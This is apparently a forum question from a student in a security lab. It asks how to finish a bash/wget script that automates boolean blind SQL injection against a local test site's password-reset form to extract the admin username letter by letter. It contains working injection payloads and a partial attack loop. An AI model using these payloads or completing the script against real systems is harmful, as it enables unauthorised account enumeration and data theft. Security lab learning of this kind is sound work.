For an IT-security lab I try to create a bash script to automate event based blind SQL injection. The website has a forgotten password feature which takes a username and either responds with "an email has been sent" or "error". This website is vulnerable to SQL injections. My aim is to retrieve the admin's username by iterating through the alphabet and challenging the database (The username consists only of a..z). The SQL Injection putting into the username field would be
' UNION SELECT username FROM users WHERE username LIKE 'a%' AND admin=1 -- -
to check if the admin's username starts with an 'a'. Next I would check 'b' and so on. I know I got the right letter when the page retrieve_password.html will be delivered otherwise it will be error.html. As soon as I got a positive feedback I will continue with the next digit, e.g. 'aa', 'ab' and so on. After each positive feedback I would check if I already have the full name by:
' UNION SELECT username FROM users WHERE username='abc' AND admin=1 -- -
My rough idea of the script:
#!/bin/bash
for ((i=0;i<50;i++))
do
for x in {a..z}
do
wget --post-data 'username=\' UNION SELECT username FROM users WHERE username like \'$name$x%\' AND admin=1 -- -' http://127.0.0.1:8081/retrieve_password
if [ #positive feedback ]
then
#Try if correct username is already retrieved
wget --post-data 'username=\' UNION SELECT username FROM users WHERE username='$name$x' AND admin=1 -- -' http://127.0.0.1:8081/retrieve_password
#If username was found exit
if [ #positive feedback ]
then
echo $name$x
exit
else
name+=$x
break
fi
fi
done
done
- What would be a proper wget statement for my purpose?
- How do I process the response to my wget post request?
